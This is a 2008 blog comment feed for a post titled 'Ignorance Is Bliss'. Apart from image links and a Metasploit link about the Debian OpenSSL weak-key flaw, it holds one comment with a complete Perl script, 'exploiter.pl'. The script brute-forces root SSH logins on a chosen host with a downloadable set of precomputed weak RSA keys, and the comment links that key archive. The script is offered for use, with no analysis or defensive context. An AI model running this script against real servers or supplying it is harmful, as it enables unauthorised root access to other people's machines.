<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Ignorance Is Bliss</title>
	<atom:link href="http://geekbazaar.org/2008/05/14/ignorance-is-bliss/feed/" rel="self" type="application/rss+xml" />
	<link>http://geekbazaar.org/2008/05/14/ignorance-is-bliss/</link>
	<description>our few seconds of fame</description>
	<pubDate>Fri, 29 Aug 2008 22:21:45 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
		<item>
		<title>By: sandro</title>
		<link>http://geekbazaar.org/2008/05/14/ignorance-is-bliss/#comment-5860</link>
		<dc:creator>sandro</dc:creator>
		<pubDate>Thu, 15 May 2008 20:15:00 +0000</pubDate>
		<guid isPermaLink="false">http://geekbazaar.org/?p=847#comment-5860</guid>
		<description>http://imgs.xkcd.com/comics/random_number.png</description>
		<content:encoded><![CDATA[<p><a href="http://imgs.xkcd.com/comics/random_number.png" rel="nofollow">http://imgs.xkcd.com/comics/random_number.png</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sandro</title>
		<link>http://geekbazaar.org/2008/05/14/ignorance-is-bliss/#comment-5844</link>
		<dc:creator>sandro</dc:creator>
		<pubDate>Thu, 15 May 2008 17:26:19 +0000</pubDate>
		<guid isPermaLink="false">http://geekbazaar.org/?p=847#comment-5844</guid>
		<description>http://img502.imageshack.us/img502/2996/pmeo9hcjp7aw9.jpg</description>
		<content:encoded><![CDATA[<p><a href="http://img502.imageshack.us/img502/2996/pmeo9hcjp7aw9.jpg" rel="nofollow">http://img502.imageshack.us/img502/2996/pmeo9hcjp7aw9.jpg</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sandro</title>
		<link>http://geekbazaar.org/2008/05/14/ignorance-is-bliss/#comment-5841</link>
		<dc:creator>sandro</dc:creator>
		<pubDate>Thu, 15 May 2008 07:22:19 +0000</pubDate>
		<guid isPermaLink="false">http://geekbazaar.org/?p=847#comment-5841</guid>
		<description>based on a post from Markus Müller 

http://www.deadbeef.de/rsa.2048.tar.bzip2

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
  print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
  print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
  print "By mm@deadbeef.de\n";
  exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) &#124;&#124; die("opendir");
while ($_ = readdir(A)) {
  chomp;
  next unless m,^\d+$,;
  push(@a, $_);
  if (scalar(@a) &#62; $keysPerConnect) {
     system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
     @a = ();
  }
}</description>
		<content:encoded><![CDATA[<p>based on a post from Markus Müller </p>
<p><a href="http://www.deadbeef.de/rsa.2048.tar.bzip2" rel="nofollow">http://www.deadbeef.de/rsa.2048.tar.bzip2</a></p>
<p>#!/usr/bin/perl<br />
my $keysPerConnect = 6;<br />
unless ($ARGV[1]) {<br />
  print &#8220;Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n&#8221;;<br />
  print &#8220;Example: ./exploiter.pl /root/keys/ 127.0.0.1\n&#8221;;<br />
  print &#8220;By <a href="mailto:mm@deadbeef.de">mm@deadbeef.de</a>\n&#8221;;<br />
  exit 0;<br />
}<br />
chdir($ARGV[0]);<br />
opendir(A, $ARGV[0]) || die(&#8221;opendir&#8221;);<br />
while ($_ = readdir(A)) {<br />
  chomp;<br />
  next unless m,^\d+$,;<br />
  push(@a, $_);<br />
  if (scalar(@a) &gt; $keysPerConnect) {<br />
     system(&#8221;echo &#8220;.join(&#8221; &#8220;, @a).&#8221;; ssh -l root &#8220;.join(&#8221; &#8220;, map { &#8220;-i<br />
&#8220;.$_ } @a).&#8221; &#8220;.$ARGV[1]);<br />
     @a = ();<br />
  }<br />
}</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sandro</title>
		<link>http://geekbazaar.org/2008/05/14/ignorance-is-bliss/#comment-5837</link>
		<dc:creator>sandro</dc:creator>
		<pubDate>Wed, 14 May 2008 21:16:22 +0000</pubDate>
		<guid isPermaLink="false">http://geekbazaar.org/?p=847#comment-5837</guid>
		<description>http://metasploit.com/users/hdm/tools/debian-openssl/</description>
		<content:encoded><![CDATA[<p><a href="http://metasploit.com/users/hdm/tools/debian-openssl/" rel="nofollow">http://metasploit.com/users/hdm/tools/debian-openssl/</a></p>
]]></content:encoded>
	</item>
</channel>
</rss>
